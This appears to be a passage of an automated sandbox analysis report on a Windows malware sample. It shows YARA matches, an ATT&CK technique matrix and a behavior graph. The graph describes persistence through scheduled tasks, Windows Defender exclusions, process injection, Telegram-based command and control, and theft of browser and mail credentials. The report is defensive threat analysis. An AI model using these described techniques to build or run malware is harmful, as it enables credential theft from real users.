                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 5472, type: MEMORYSTR
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job
                3
                Obfuscated Files or Information
                Security Account Manager11
                Security Software Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object Model1
                Email Collection
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets31
                Virtualization/Sandbox Evasion
                SSH1
                Input Capture
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631774 Sample: ckHregxJIq.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 15 other signatures 2->68 8 ckHregxJIq.exe 7 2->8         started        12 aFAsiNcQRJEVeL.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\...\aFAsiNcQRJEVeL.exe, PE32 8->38 dropped 40 C:\...\aFAsiNcQRJEVeL.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpD0A2.tmp, XML 8->42 dropped 44 C:\Users\user\AppData\...\ckHregxJIq.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Injects a PE file into a foreign processes 8->74 14 powershell.exe 23 8->14         started        17 ckHregxJIq.exe 15 2 8->17         started        20 powershell.exe 22 8->20         started        26 2 other processes 8->26 76 Antivirus detection for dropped file 12->76 78 Multi AV Scanner detection for dropped file 12->78 22 aFAsiNcQRJEVeL.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 80 Loading BitLocker PowerShell Module 14->80 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        46 checkip.dyndns.com 132.226.247.73, 49693, 49696, 49698 UTMEMUS United States 17->46 48 api.telegram.org 149.154.167.220, 443, 49728, 49729 TELEGRAMRU United Kingdom 17->48 50 reallyfreegeoip.org 104.21.96.1, 443, 49694, 49695 CLOUDFLARENETUS United States 17->50 32 conhost.exe 20->32         started        82 Tries to steal Mail credentials (via file / registry access) 22->82 84 Tries to harvest and steal browser information (history, passwords, etc) 22->84 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.